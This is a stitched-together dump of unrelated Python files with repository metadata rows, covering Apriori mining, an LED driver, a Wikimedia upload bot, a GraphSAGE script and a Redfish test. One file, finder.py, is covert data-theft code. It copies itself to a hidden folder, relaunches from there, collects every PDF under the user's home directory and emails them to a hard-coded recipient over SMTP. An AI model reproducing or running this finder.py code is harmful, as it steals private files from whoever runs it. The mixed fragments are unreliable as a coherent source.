itemsets.
candidates : frozenset
The list of candidate itemsets.
min_support : float
The minimum support threshold.
Returns
-------
retlist : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
"""
sscnt = {} # set for support counts
for tid in dataset:
for can in candidates:
if can.issubset(tid):
sscnt.setdefault(can, 0)
sscnt[can] += 1
num_items = float(len(dataset)) # total number of transactions in the dataset
retlist = [] # array for unpruned itemsets
support_data = {} # set for support data for corresponding itemsets
for key in sscnt:
# Calculate the support of itemset key.
support = sscnt[key] / num_items
if support >= min_support:
retlist.insert(0, key)
support_data[key] = support
# Print a list of the pruned itemsets.
if verbose:
for kset in retlist:
for item in kset:
print(("{" + str(item) + "}"))
print("")
for key in sscnt:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(key)]).rstrip(', ') \
+ "}" \
+ ": sup = " + str(support_data[key])))
return retlist, support_data
def apriori_gen(freq_sets, k):
"""Generates candidate itemsets (via the F_k-1 x F_k-1 method).
This operation generates new candidate k-itemsets based on the frequent
(k-1)-itemsets found in the previous iteration. The candidate generation
procedure merges a pair of frequent (k-1)-itemsets only if their first k-2
items are identical.
Parameters
----------
freq_sets : list
The list of frequent (k-1)-itemsets.
k : integer
The cardinality of the current itemsets being evaluated.
Returns
-------
retlist : list
The list of merged frequent itemsets.
"""
retList = [] # list of merged frequent itemsets
lenLk = len(freq_sets) # number of frequent itemsets
for i in range(lenLk):
for j in range(i+1, lenLk):
a=list(freq_sets[i])
b=list(freq_sets[j])
a.sort()
b.sort()
F1 = a[:k-2] # first k-2 items of freq_sets[i]
F2 = b[:k-2] # first k-2 items of freq_sets[j]
if F1 == F2: # if the first k-2 items are identical
# Merge the frequent itemsets.
retList.append(freq_sets[i] | freq_sets[j])
return retList
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Generates a set of candidate rules.
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
support_data : dict
The support data for all candidate itemsets.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
"""
m = len(H[0])
if m == 1:
Hmp1 = calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
if (len(freq_set) > (m+1)):
Hmp1 = apriori_gen(H, m+1) # generate candidate itemsets
Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
if len(Hmp1) > 1:
# If there are candidate rules above the minimum confidence
# threshold, recurse on the list of these candidate rules.
rules_from_conseq(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Evaluates the generated rules.
One measurement for quantifying the goodness of association rules is
confidence. The confidence for a rule 'P implies H' (P -> H) is defined as
the support for P and H divided by the support for P
(support (P|H) / support(P)), where the | symbol denotes the set union
(thus P|H means all the items in set P or in set H).
To calculate the confidence, we iterate through the frequent itemsets and
associated support data. For each frequent itemset, we divide the support
of the itemset by the support of the antecedent (left-hand-side of the
rule).
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
min_support : float
The minimum support threshold.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
pruned_H : list
The list of candidate rules above the minimum confidence threshold.
"""
pruned_H = [] # list of candidate rules above the minimum confidence threshold
for conseq in H: # iterate over the frequent itemsets
conf = support_data[freq_set] / support_data[freq_set - conseq]
if conf >= min_confidence:
rules.append((freq_set - conseq, conseq, conf))
pruned_H.append(conseq)
if verbose:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(freq_set-conseq)]).rstrip(', ') \
+ "}" \
+ " ---> " \
+ "{" \
+ "".join([str(i) + ", " for i in iter(conseq)]).rstrip(', ') \
+ "}" \
+ ": conf = " + str(round(conf, 3)) \
+ ", sup = " + str(round(support_data[freq_set], 3))))
return pruned_H
def generate_rules(F, support_data, min_confidence=0.5, verbose=True):
"""Generates a set of candidate rules from a list of frequent itemsets.
For each frequent itemset, we calculate the confidence of using a
particular item as the rule consequent (right-hand-side of the rule). By
testing and merging the remaining rules, we recursively create a list of
pruned rules.
Parameters
----------
F : list
A list of frequent itemsets.
support_data : dict
The corresponding support data for the frequent itemsets (L).
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
rules : list
The list of candidate rules above the minimum confidence threshold.
"""
rules = []
for i in range(1, len(F)):
for freq_set in F[i]:
H1 = [frozenset([itemset]) for itemset in freq_set]
if (i > 1):
rules_from_conseq(freq_set, H1, support_data, rules, min_confidence, verbose)
else:
calc_confidence(freq_set, H1, support_data, rules, min_confidence, verbose)
return rules
| 35.093085
| 117
| 0.617582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,200
| 0.545661
|
0b3087eb0d5de6a063260501def92d99d71d6436
| 397
|
py
|
Python
|
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
description='Tech@NYU API Python Client',
author='TechatNYU',
url='https://github.com/TechAtNYU/pytnyu',
author_email='hello@techatnyu.org',
version='0.0.4',
install_requires=['requests'],
namespace_packages=['pytnyu'],
packages=['pytnyu'],
name='pytnyu',
)
| 23.352941
| 46
| 0.677582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.347607
|
0b36a23da3938dd6a58c332d22bc21433cd520a7
| 2,949
|
py
|
Python
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 26
|
2018-09-27T17:27:30.000Z
|
2022-03-04T20:37:18.000Z
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 30
|
2018-10-15T03:54:58.000Z
|
2020-05-28T06:57:08.000Z
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 16
|
2018-10-04T03:16:43.000Z
|
2021-04-25T06:59:49.000Z
|
import spidev
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
spi = None
def setup(robot_config):
global LEDEmoteSmile
global LEDEmoteSad
global LEDEmoteTongue
global LEDEmoteSuprise
global module
global spi
#LED controlling
spi = spidev.SpiDev()
spi.open(0,0)
#VCC -> RPi Pin 2
#GND -> RPi Pin 6
#DIN -> RPi Pin 19
#CLK -> RPi Pin 23
#CS -> RPi Pin 24
# decoding:BCD
spi.writebytes([0x09])
spi.writebytes([0x00])
# Start with low brightness
spi.writebytes([0x0a])
spi.writebytes([0x03])
# scanlimit; 8 LEDs
spi.writebytes([0x0b])
spi.writebytes([0x07])
# Enter normal power-mode
spi.writebytes([0x0c])
spi.writebytes([0x01])
# Activate display
spi.writebytes([0x0f])
spi.writebytes([0x00])
rotate = robot_config.getint('max7219', 'ledrotate')
if rotate == 180:
LEDEmoteSmile = LEDEmoteSmile[::-1]
LEDEmoteSad = LEDEmoteSad[::-1]
LEDEmoteTongue = LEDEmoteTongue[::-1]
LEDEmoteSurprise = LEDEmoteSurprise[::-1]
SetLED_Off()
def SetLED_On():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOn[i]])
def SetLED_Off():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOff[i]])
def SetLED_E_Smiley():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSmile[i]])
def SetLED_E_Sad():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSad[i]])
def SetLED_E_Tongue():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteTongue[i]])
def SetLED_E_Surprised():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSurprise[i]])
def SetLED_Low():
# brightness MIN
spi.writebytes([0x0a])
spi.writebytes([0x00])
def SetLED_Med():
#brightness MED
spi.writebytes([0x0a])
spi.writebytes([0x06])
def SetLED_Full():
# brightness MAX
spi.writebytes([0x0a])
spi.writebytes([0x0F])
def move(args):
command = args['command']
if command == 'LED_OFF':
SetLED_Off()
if command == 'LED_FULL':
SetLED_On()
SetLED_Full()
if command == 'LED_MED':
SetLED_On()
SetLED_Med()
if command == 'LED_LOW':
SetLED_On()
SetLED_Low()
if command == 'LED_E_SMILEY':
SetLED_On()
SetLED_E_Smiley()
if command == 'LED_E_SAD':
SetLED_On()
SetLED_E_Sad()
if command == 'LED_E_TONGUE':
SetLED_On()
SetLED_E_Tongue()
if command == 'LED_E_SURPRISED':
SetLED_On()
SetLED_E_Suprised()
| 25.205128
| 57
| 0.617158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 375
| 0.127162
|
0b36b0a444f2d74d0736b72d8524d171de6f01c9
| 9,236
|
py
|
Python
|
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | 3
|
2018-11-14T14:06:09.000Z
|
2018-11-14T18:23:16.000Z
|
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | null | null | null |
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | 2
|
2018-11-14T14:06:23.000Z
|
2019-09-22T08:25:55.000Z
|
#!/usr/bin/env python
from datapackage_pipelines.wrapper import ingest, spew
import logging, collections
from pipeline_params import get_pipeline_param_rows
from google.cloud import storage
from contextlib import contextmanager
from tempfile import mkdtemp
import os
import pywikibot
import time
from pywikibot.pagegenerators import GeneratorFactory
import datetime
from pywikibot.specialbots import UploadRobot
from pywikibot.data.api import APIError
import sys
from datapackage import Package
LICENSE_TEMPLATE = "PD-Israel"
SUPPORTED_TEMPLATE = "Supported by Wikimedia Israel|year=2018"
FILES_CATEGORY = "Files from JNF uploaded by Wikimedia Israel"
FILES_CATEGORY_ID = "Files_from_JNF_uploaded_by_Wikimedia_Israel"
DESCRIPTION_TEMPLATE=lambda description, datestring, source, author, jnfnum: """=={{int:filedesc}}==
{{Information
|description={{he|1=__DESCRIPTION__}}
|date=__DATESTRING__
|source={{he|1=__SOURCE__}}
|author={{he|1=__AUTHOR__}}
|permission=
|other versions=
|other fields={{Information field|Name=JNF Number|Value=__JNFNUM__}}
}}
=={{int:license-header}}==
{{__LICENSE__}}
{{__SUPPORTED__}}
[[Category:__FILESCAT__]]""".replace("__DATESTRING__", datestring) \
.replace("__SOURCE__", source) \
.replace("__AUTHOR__", author) \
.replace("__JNFNUM__", jnfnum) \
.replace("__DESCRIPTION__", description) \
.replace("__LICENSE__", LICENSE_TEMPLATE) \
.replace("__SUPPORTED__", SUPPORTED_TEMPLATE) \
.replace("__FILESCAT__", FILES_CATEGORY) \
@contextmanager
def temp_dir(*args, **kwargs):
dir = mkdtemp(*args, **kwargs)
try:
yield dir
except Exception:
if os.path.exists(dir):
os.rmdir(dir)
raise
@contextmanager
def temp_file(*args, **kwargs):
with temp_dir(*args, **kwargs) as dir:
file = os.path.join(dir, "temp")
try:
yield file
except Exception:
if os.path.exists(file):
os.unlink(file)
raise
@contextmanager
def throttle(delay_seconds=None):
delay_seconds = int(os.environ.get("THROTTLE_SECONDS", "1")) if not delay_seconds else delay_seconds
if hasattr(throttle, 'last_call'):
seconds_since_last_call = (datetime.datetime.now() - throttle.last_call).seconds
if seconds_since_last_call < delay_seconds:
logging.info("throttling {} seconds...".format(delay_seconds - seconds_since_last_call))
time.sleep(delay_seconds - seconds_since_last_call)
yield
throttle.last_call = datetime.datetime.now()
def delete_page(page):
with throttle():
page.delete(reason="Deleting duplicated images created by bot", prompt=True, mark=True)
def get_gcs_bucket(consts):
logging.info("uploading from google storage bucket {}".format(consts["gcs_bucket"]))
gcs = storage.Client.from_service_account_json(consts["gcs_secret_file"])
return gcs.get_bucket(consts["gcs_bucket"])
def init_stats():
stats = {}
stats["num eligible for download"] = 0
stats["invalid resolution"] = 0
stats["invalid description"] = 0
stats["invalid source"] = 0
stats["invalid year"] = 0
stats["in skip list"] = 0
stats["skipped start at"] = 0
stats['invalid image_path'] = 0
return stats
def get_donum_from_row(row):
return row["image_path"].replace("/ArchiveTazlumim/TopSmlPathArc/Do", "").replace(".jpeg", "")
def is_valid_row(row, stats):
if row["width_px"] * row["height_px"] < 200 * 200:
stats["invalid resolution"] += 1
logging.info('invalid resolution: {} X {}'.format(row["width_px"], row["height_px"]))
return False
elif len(row["description"]) < 3:
stats["invalid description"] += 1
logging.info('invalid description: {}'.format(row["description"]))
return False
elif len(row["source"]) < 2:
stats["invalid source"] += 1
logging.info('invalid source: {}'.format(row["source"]))
return False
elif row["date"].year > 1947:
stats["invalid year"] += 1
logging.info('invalid year: {}'.format(row["date"]))
return False
elif 'mi:' in row['image_path']:
stats['invalid image_path'] += 1
logging.info('invalid image path: {}'.format(row['image_path']))
return False
else:
stats["num eligible for download"] += 1
return True
# def load_datapackage_resources(resources, stats):
# logging.info("Loading datapackage resources...")
# donums = {}
# start_at_donum = False
# reached_start_at = False
# for resource in resources:
# for row_num, row in enumerate(resource, start=1):
# donum = get_donum_from_row(row)
# if start_at_donum and not reached_start_at and donum != start_at_donum:
# stats["skipped start at"] += 1
# elif is_valid_row(row, stats):
# if start_at_donum and donum == start_at_donum:
# reached_start_at = True
# donums[donum] = row
# stats["num eligible for download"] += 1
# return donums
def upload(consts, parameters, row, donum, stats, retry_num=0):
if is_valid_row(row, stats):
if os.environ.get('WIKISCRAPER_DRY_RUN'):
site = None
else:
site = pywikibot.Site()
site.login()
gcs_bucket = get_gcs_bucket(consts)
blob = gcs_bucket.blob("data/kkl/images" + row["image_path"])
with temp_file() as filename:
blob.download_to_filename(filename)
logging.info(os.path.getsize(filename))
page_title = row["description"][:100] + "-JNF{}.jpeg".format(donum)
logging.info("page_title={}".format(page_title))
if os.environ.get('WIKISCRAPER_DRY_RUN'):
page = None
else:
page = pywikibot.FilePage(site, page_title)
assert page.site.family == 'commons', 'invalid page site: {}'.format(page.site)
page_text = DESCRIPTION_TEMPLATE(row["description"], str(row["date"]), 'ארכיון הצילומים של קק"ל',
row["source"], donum)
if os.environ.get('WIKISCRAPER_DRY_RUN'):
logging.info(" -- {} -- \n{}".format(filename, page_text))
else:
with throttle():
if not page.exists():
page.text = page_text
if page.upload(filename, comment="uploaded by wmilbot", ignore_warnings=True):
logging.info("uploaded successfully")
else:
raise Exception("Upload failed")
else:
page.get()
page.text = page_text
page.save(summary='update by wmilbot')
return True, ''
else:
return True, 'invalid row'
def ingest_spew():
raise NotImplementedError
# parameters, datapackage, resources = ingest()
# parameters = next(get_pipeline_param_rows(parameters["pipeline-id"], parameters["pipeline-parameters"]))
# consts = next(get_pipeline_param_rows('constants', 'kkl-parameters.csv'))
# gcs_bucket = get_gcs_bucket(consts)
# stats = init_stats()
# for donum, row in load_datapackage_resources(resources, stats).items():
# success, error = upload(gcs_bucket, parameters, row, donum)
# assert success
# spew(dict(datapackage, resources=[]), [])
def cli_upload(consts, parameters, start_donum=None, upload_limit=1):
reached_start_at = False if start_donum else True
num_uploaded = 0
package = Package('final-data/kkl/extended-metadata/datapackage.json')
stats = init_stats()
for row in package.get_resource('kkl').iter(keyed=True):
donum = get_donum_from_row(row)
if reached_start_at or donum == start_donum:
reached_start_at = True
success, error = upload(consts, parameters, row, donum, stats)
if success:
num_uploaded += 1
if upload_limit > 0 and num_uploaded >= upload_limit:
break
stats['num processed'] = num_uploaded
stats['last donum'] = donum
print(stats)
def cli():
parameters = next(get_pipeline_param_rows('kkl-wikicommons-upload', 'kkl-parameters.csv'))
consts = next(get_pipeline_param_rows('constants', 'kkl-parameters.csv'))
if len(sys.argv) > 2:
if sys.argv[2] == 'upload':
if len(sys.argv) > 3:
if sys.argv[3] == 'all':
cli_upload(consts, parameters, None, 0)
else:
cli_upload(consts, parameters, sys.argv[3])
else:
cli_upload(consts, parameters)
if sys.argv[2] == 'upload-after':
cli_upload(consts, parameters, sys.argv[3],
upload_limit=int(sys.argv[4]) if len(sys.argv) > 4 else 1)
if len(sys.argv) > 1 and sys.argv[1] == '--cli':
cli()
else:
ingest_spew()
| 37.092369
| 110
| 0.612711
| 0
| 0
| 992
| 0.107185
| 1,040
| 0.112372
| 0
| 0
| 3,114
| 0.336467
|
0b373158f05135f2dafba65a6ba39cdf0ba87c6d
| 1,348
|
py
|
Python
|
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | null | null | null |
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | 1
|
2021-03-04T08:48:38.000Z
|
2021-03-04T08:48:38.000Z
|
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | 2
|
2020-08-26T06:36:51.000Z
|
2021-03-04T08:08:34.000Z
|
#!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Insert random trigger file into the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
'''Get metadata'''
result = fcc.getDirectoryMetadata(lfn)
if not result['OK']:
print result['Message']
return
if result['Value'].has_key(metaname):
return result['Value'][metaname]
def main():
lfns = args
for lfn in lfns:
print '================================================================================'
print 'Decay card for: %s' % lfn
print '--------------------------------------------------------------------------------'
# print getMeta(lfn, 'jobOptions')
print getMeta(lfn, 'decayCard')
print '--------------------------------------------------------------------------------'
if __name__ == '__main__':
main()
| 25.923077
| 96
| 0.557864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 519
| 0.385015
|
0b39211e58c62524837539f8c02eb738f733141e
| 1,037
|
py
|
Python
|
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
import pickle
import networkx as nx
import numpy as np
import torch
for name in ('cora', 'citeseer', 'pubmed'):
with open(f'data/datasets/{name}.pkl', 'rb') as fin:
dataset = pickle.load(fin)
test_graph = dataset['original_graph']
e2i = dataset['edge2idx']
H = dataset['H']
node_fts = torch.zeros((test_graph.number_of_nodes(), 128))
for u, v in test_graph.edges():
ef = H[e2i[(u, v)]][3:-1]
node_fts[u] = ef[:128]
node_fts[v] = ef[128:]
train_nodes = []
for idx in range(dataset['num_datasets']):
tn = []
for u, v in dataset['Xy'][idx]['train']['X']:
if u not in tn:
tn.append(u)
if v not in tn:
tn.append(v)
train_nodes.append(tn)
nx.write_edgelist(test_graph, f'GraphSAGE/data/{name}.edgelist')
np.save(f'GraphSAGE/data/{name}-node-features', node_fts.numpy())
with open(f'GraphSAGE/data/{name}-train-nodes.pkl', 'wb') as fout:
pickle.dump(train_nodes, fout)
| 25.925
| 70
| 0.580521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 227
| 0.218901
|
0b3963c63ed1877c12683ef9458a7f962df91e0e
| 3,243
|
py
|
Python
|
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | 3
|
2017-11-11T01:19:57.000Z
|
2021-07-07T15:44:32.000Z
|
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | null | null | null |
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | null | null | null |
import os
import fnmatch
import smtplib
import email.mime.application
import sys
import subprocess
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
home = str(Path.home()) # Return a string representing the user’s home directory
fileFound = 0 # Number of files found while discovering
fileScanned = 0 # Number of the already processed files
maxSize = 23068672 # Attachments bytes limit for the mail host (22MB in byte, but it can be changed)
actualSizeCounter = 0 # Bytes count for files already attached to the email
paths = [] # List of files directories, matching the pattern, that will be print into the email body
# Following values need to be changed
email_user = "SENDER-ADDRESS-HERE"
email_pwd = "SENDER-PASSWORD-HERE"
recipient = "RECIPIENT-ADDRESS-HERE"
"""
This function will return a list of strings which represents the files path with the specified extension inside the
specified path
"""
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
"""
__________ START - It may NOT work on MacOS __________
| |
"""
injecting_folder = home+'\\script' # 'Injecting' folder
if not os.path.exists(injecting_folder):
os.system("mkdir %s" % injecting_folder)
executableLocation = find('EXECUTABLE-NAME-HERE.exe', os.path.dirname(os.path.abspath(__file__)))
# Create a new 'injecting' folder where software will copy itself
if not os.path.isfile(injecting_folder + "\\EXECUTABLE-NAME-HERE.exe"):
os.system("xcopy {!s} {!s} /R".format(executableLocation[0], injecting_folder))
# If current working directory is not the 'injecting' folder opens a new instance from there and close this one.
if os.getcwd() != injecting_folder:
os.chdir(injecting_folder)
subprocess.Popen([injecting_folder+'\\EXECUTABLE-NAME-HERE.exe'], stdin=None, stdout=None, stderr=None)
sys.exit()
"""
|__________ END - It may NOT work on MacOS __________|
"""
filesFound = find("*.pdf", home) # List of every pdf file found in every folder starting from the user's home directory
# Building the email structure
msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = recipient
msg['Subject'] = "Files Found"
for f in filesFound:
fp = open(r'%s' % f, 'rb')
att = email.mime.application.MIMEApplication(fp.read())
fp.close()
paths.append("Directory: " + f)
att.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
msg.attach(att)
for p in paths:
msg.attach(MIMEText(p, 'plain'))
# Open the connection with mail host with specified credentials
server = smtplib.SMTP('smtp.gmail.com', 587) # These values are just an example working with Gmail, you need to change
# them with your own host's SMTP address and port
server.ehlo()
server.starttls() # Starts a secure tls connection
server.login(email_user, email_pwd)
email_body = msg.as_string()
server.sendmail(email_user, recipient, email_body) # Send the email
server.quit() # Close the connection with host
sys.exit() # Quit program
| 35.25
| 120
| 0.716929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,633
| 0.503236
|
0b3b1b7fa53f607bfa6820806f9bdec88c43a29d
| 2,092
|
py
|
Python
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 37
|
2017-03-24T10:17:37.000Z
|
2022-02-10T19:42:26.000Z
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 4
|
2020-07-08T10:53:30.000Z
|
2020-07-30T11:56:20.000Z
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 29
|
2017-07-19T21:28:06.000Z
|
2021-06-09T05:20:32.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import sushy
from sushy.resources.fabric import endpoint
from sushy.tests.unit import base
class EndpointTestCase(base.TestCase):
def setUp(self):
super(EndpointTestCase, self).setUp()
self.conn = mock.Mock()
with open('sushy/tests/unit/json_samples/'
'endpoint.json') as f:
self.json_doc = json.load(f)
self.conn.get.return_value.json.return_value = self.json_doc
self.fab_endpoint = endpoint.Endpoint(
self.conn, '/redfish/v1/Fabrics/SAS/Endpoints/Drive1',
redfish_version='1.0.2')
def test__parse_atrtributes(self):
self.fab_endpoint._parse_attributes(self.json_doc)
self.assertEqual('Drive1', self.fab_endpoint.identity)
self.assertEqual('SAS Drive', self.fab_endpoint.name)
self.assertEqual(sushy.PROTOCOL_TYPE_SAS,
self.fab_endpoint.endpoint_protocol)
self.assertEqual(sushy.ENTITY_TYPE_DRIVE,
self.fab_endpoint.connected_entities[0].entity_type)
self.assertEqual(sushy.ENTITY_ROLE_TARGET,
self.fab_endpoint.connected_entities[0].entity_role)
con_entity = self.fab_endpoint.connected_entities[0]
self.assertEqual(sushy.DURABLE_NAME_FORMAT_NAA,
con_entity.identifiers[0].durable_name_format)
self.assertEqual('32ADF365C6C1B7C3',
con_entity.identifiers[0].durable_name)
| 40.230769
| 78
| 0.68021
| 1,385
| 0.662046
| 0
| 0
| 0
| 0
| 0
| 0
| 694
| 0.33174
|
0b3d35d3fa9e0c6688b8c47ccf07458bfaa3bde8
| 231
|
py
|
Python
|
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | 1
|
2022-01-12T08:31:59.000Z
|
2022-01-12T08:31:59.000Z
|
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | null | null | null |
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | 2
|
2022-01-19T06:26:32.000Z
|
2022-01-26T15:25:15.000Z
|
#!/usr/bin/python
# -*- coding: UTF-8 -*
from db.it.db_it_mgr import it_mgr
__all__ = {"itSingleton"}
class itSingleton():
def get_cmd_sql(self, sql):
return it_mgr.get_cmd_sql(sql)
it_singleton = itSingleton()
| 13.588235
| 38
| 0.670996
| 93
| 0.402597
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.225108
|
0b3f444aab07f3ace7008a9a2f44f279835a4a8e
| 25,437
|
py
|
Python
|
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
def func():
# Used to re-compute specific failed jobs, `None` otherwise.
indices = [
0,
1,
2,
3,
4,
7,
8,
9,
15,
61,
62,
63,
64,
65,
66,
68,
69,
73,
75,
76,
77,
78,
79,
80,
81,
82,
83,
92,
93,
102,
103,
119,
120,
121,
122,
123,
128,
129,
130,
132,
169,
170,
171,
172,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
188,
189,
200,
201,
208,
209,
229,
230,
231,
232,
233,
235,
236,
237,
242,
260,
261,
275,
276,
277,
278,
280,
281,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
302,
303,
333,
334,
335,
336,
337,
345,
346,
347,
349,
366,
367,
382,
383,
384,
385,
390,
391,
397,
401,
402,
403,
404,
405,
406,
407,
408,
409,
419,
420,
446,
447,
448,
449,
450,
456,
457,
458,
465,
479,
480,
488,
489,
490,
491,
492,
493,
499,
500,
501,
502,
503,
505,
506,
507,
508,
509,
520,
521,
532,
533,
548,
549,
550,
551,
552,
553,
554,
555,
556,
561,
562,
563,
